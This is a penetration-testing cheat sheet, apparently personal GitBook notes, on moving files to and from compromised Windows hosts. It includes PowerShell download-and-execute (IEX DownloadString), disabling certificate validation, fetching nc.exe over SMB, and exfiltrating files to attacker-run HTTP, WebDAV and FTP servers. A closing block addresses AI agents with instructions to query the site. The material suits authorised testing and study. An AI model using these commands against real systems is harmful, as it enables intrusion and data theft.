# Windows File Transfer ## Transfer File to Target Machine ### **PowerShell Base64 Encode & Decode** ```bash # Pwnbox Check SSH Key MD5 Hash md5sum id_rsa # Pwnbox Encode SSH Key to Base64 cat id_rsa |base64 -w 0;echo # Copy the content and paste in windows powersehll terminal and use some powershel functions to decode it PS C:\> [IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1C----0tLQo=")) # We can confirm if the file was transferred successfully using the Get-FileHash cmdlet, which does the same thing that md5sum does. PS C:\> Get-FileHash C:\Users\Public\id_rsa -Algorithm md5 ``` ### **PowerShell Web Downloads** ```bash ------------------- PowerShell DownloadFile Method --------------------- PS C:\> # Example: (New-Object Net.WebClient).DownloadFile('','') PS C:\> (New-Object Net.WebClient).DownloadFile(' # Example: (New-Object Net.WebClient).DownloadFileAsync('','') PS C:\> (New-Object Net.WebClient).DownloadFileAsync(' IEX (New-Object Net.WebClient).DownloadString('Invoke-WebRequest -OutFile PowerView.ps1 # if ps shows error Internet Explorer first-launch configuration has not been completed, it can be bypassed using the parameter -UseBasicParsing. PS C:\> Invoke-WebRequest https:/// -UseBasicParsing | IEX # another error ps shows is related to the SSL/TLS secure channel if the certificate is not trusted PS C:\> [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` ### SMB Downloads ```bash ---- without user/pass # Create the SMB Server sudo impacket-smbserver share -smb2support /tmp/smbshare smbserver.py a -smb2support . # Copy a File from the SMB Server C:\> copy \\\share\nc.exe ---- with user/pass # Create the SMB Server with a Username and Password sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test smbserver.py a -smb2support . -username tt -password tt # Mount the SMB Server with Username and Password C:\\> net use n: \\\share /user:test test # other userful comands net use \\\share /u:df df # to connect copy file \\\share\ # to copy a file del file net use /d \\\share # to delete the share # note : You can also mount the SMB server if you receive an error when you use `copy filename \\\\IP\\sharename`. ``` ### FTP Downloads ```bash # Installing the FTP Server Python3 Module - pyftpdlib sudo pip3 install pyftpdlib # Setting up a Python3 FTP Server sudo python3 -m pyftpdlib --port 21 # Transfering Files from an FTP Server Using PowerShell PS C:\> (New-Object Net.WebClient).DownloadFile('/file.txt>', 'ftp-file.txt') # If we do not have interactive shell, we can create an FTP command file to download a file. # Create a Command File for the FTP Client and Download the Target File --- C:\> echo open > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo GET file.txt >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open Log in with USER and PASS first. ftp> USER anonymous ftp> GET file.txt ftp> bye --- ``` ## Get File from target host to our attack machine ### **PowerShell Base64 Encode & Decode** ```bash # Encode File Using PowerShell PS C:\> [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) # Decode Base64 String in Linux echo IyBDb3B5cmlnaH-----3N0DQo= | base64 -d > hosts md5sum hosts ``` ### **PowerShell Web Uploads** ```bash # Installing a Configured WebServer with Upload pip3 install uploadserver # start a upload server python3 -m uploadserver ----------- PowerShell Script to Upload a File to Python Upload Server ------- # PSUpload.ps1 : PS C:\> Invoke-FileUpload -Uri :8000/upload> -File C:\Windows\System32\drivers\etc\hosts ---------------------- PowerShell Base64 Web Upload ----------------------- PS C:\> $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) PS C:\> Invoke-WebRequest -Uri -Method POST -Body $b64 # start a listener to get base64 encoded data from target machine and decode it nc -lvnp 8000 echo | base64 -d -w 0 > hosts ``` ### SMB Uploads ```bash # Installing WebDav Python modules sudo pip install wsgidav cheroot # Using the WebDav Python module sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous # Connecting to the Webdav Share C:\> dir \\\DavWWWRoot # Uploading Files using SMB C:\> copy C:\Users\user\Desktop\SourceCode.zip \\\DavWWWRoot\ ``` ### FTP Uploads ```bash # we need to specify the option --write to allow clients to upload files to our attack host. sudo python3 -m pyftpdlib --port 21 --write # use the PowerShell upload function to upload a file to our FTP Server. PS C:\> (New-Object Net.WebClient).UploadFile('/ftp-hosts>', 'C:\Windows\System32\drivers\etc\hosts') # Create a Command File for the FTP Client to Upload a File --- C:\> echo open ip > ftpcommand.txt C:\> echo USER anonymous >> ftpcommand.txt C:\> echo binary >> ftpcommand.txt C:\> echo PUT c:\\windows\\system32\\drivers\\etc\\hosts >> ftpcommand.txt C:\> echo bye >> ftpcommand.txt C:\> ftp -v -n -s:ftpcommand.txt ftp> open ip Log in with USER and PASS first. ftp> USER anonymous ftp> PUT c:\windows\system32\drivers\etc\hosts ftp> bye --- ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://strange-1.gitbook.io/notes/file-transfers/windows-file-transfer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.